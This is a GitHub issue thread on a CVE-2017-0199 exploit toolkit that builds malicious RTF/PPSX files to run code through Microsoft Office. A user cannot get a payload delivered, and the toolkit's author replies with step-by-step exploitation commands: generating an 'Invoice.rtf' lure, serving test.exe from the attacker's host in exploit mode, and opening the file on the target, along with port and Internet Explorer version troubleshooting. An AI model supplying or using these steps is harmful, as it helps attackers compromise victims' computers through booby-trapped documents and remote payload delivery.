search

bhdresh / CVE-2017-0199

Exploit toolkit CVE-2017-0199 - v4.0 is a handy python script which provides pentesters and security researchers a quick and effective way to test Microsoft Office RCE. It could generate a malicious RTF/PPSX file and deliver metasploit / meterpreter / other payload to victim without any complex configuration.
724 stars 261 forks source link

Request for help please #58

Open ITLerner opened 7 years ago

ITLerner commented 7 years ago

I am using kali linux2. I generated rtf file using command python cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u http://192.168.1.100:443 Then I use command python cve-2017-0199_toolkit.py -M exp -p 443 -e http://192.168.1.100/test.exe for running exploitation mode... When i run test.rtf on a windows machine I got "Received GET method from 192.168.1.108" twice .. Issue is that test.exe is NOT delivering there on the windows machine. Please help me. Thanks

bhdresh commented 6 years ago

I think you missed to specify port in -e argument, it should be something like as http://192.168.1.100:443/test.exe because tool is running on 443 and not on 80

On 6 Dec 2017 1:48 p.m., "ITLerner" notifications@github.com wrote:

I am using kali linux2. I generated rtf file using command python cve-2017-0199_toolkit.py -M gen -t RTF -w test.rtf -u http://192.168.1.100:443 Then I use command python cve-2017-0199_toolkit.py -M exp -p 443 -e http://192.168.1.100/test.exe for running exploitation mode... When i run test.rtf on a windows machine I got "Received GET method from 192.168.1.108" twice .. Issue is that test.exe is NOT delivering there on the windows machine. Please help me. Thanks

— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/bhdresh/CVE-2017-0199/issues/58, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLbnVVitvtAnYO6LlC0GQAdxDyA6Hks5s9mLggaJpZM4Q3ocX .

ITLerner commented 6 years ago

Dear bhdresh i am extremely thankful for your reply. I changed -e argument same as you mentioned please. I have still same issue . Receiving "Received GET method from 192.168.1.108" twice (in two lines) . I am confused on HTA .. I think HTA should delivered payload But in my case i dont have added this. Please help me how can i add hta..

bhdresh commented 6 years ago

I see, let's start with basic setup then,

Step 1) Generate RTF using below command,

python cve-2017-0199_toolkit.py -M gen -t RTF -w Invoice.rtf -u http://192.168.1.100/logo.doc

Step 2) Copy test.exe in to /tmp

Step 3) Start toolkit in exploit mode using following command,

python cve-2017-0199_toolkit.py -M exp -t RTF -e http://192.168.1.100/test.exe -l /tmp/test.exe

Step 4) Open RTF file on target.

Note: it was pointed out in metasploit thread that Internet Explorer version should be at least IE10 (rapid7/metasploit-framework#8220 https://github.com/rapid7/metasploit-framework/issues/8220).

Hope this will help :)

On 6 Dec 2017 8:26 p.m., "ITLerner" notifications@github.com wrote:

Dear bhdresh i am extremely thankful for your reply. I changed -e argument same as you mentioned please. I have still same issue . Receiving "Received GET method from 192.168.1.108" twice (in two lines) . I am confused on HTA .. I think HTA should delivered payload But in my case i dont have added this. Please help me how can i add hta..

— You are receiving this because you commented.

Reply to this email directly, view it on GitHub https://github.com/bhdresh/CVE-2017-0199/issues/58#issuecomment-349693261, or mute the thread https://github.com/notifications/unsubscribe-auth/AIhKLRWJU7viiHLSHjt3nY0X4meOZi1Jks5s9sBNgaJpZM4Q3ocX .

ITLerner commented 6 years ago

Thanks again for your time and reply. I did the same as you mentioned. This time I didn't find anything when Start toolkit in exploit mode. even no "Received GET method from..." I am unable to understand what is the logo.doc in -u argument ... ?

bhdresh commented 6 years ago

Are you sure the target is vulnerable and IE version is 10+?

Regarding your query about arguments, below image from README.md should be able to help you understand the flow and role of arguments being used,

https://raw.githubusercontent.com/bhdresh/CVE-2017-0199/v3.0-beta-2.0/Scenario1.jpg

Thanks.

ITLerner commented 6 years ago

yes, i am 100 % sure Please. I am testing it on windows 8.1, IE 11. When I use -u command without logo.doc (mentioned at the end of the command) then I received ( "Received GET method from...") which indicates system Vulnerability. but my payload is not delivering ... If I used -u arrangement with logo.doc then i didn't receive any response. Please explain what is logo.doc?? hope you will understand my point and help me. Regards

spadacio commented 6 years ago

What is logo.doc ? Can this be used on remote server ? or just local ?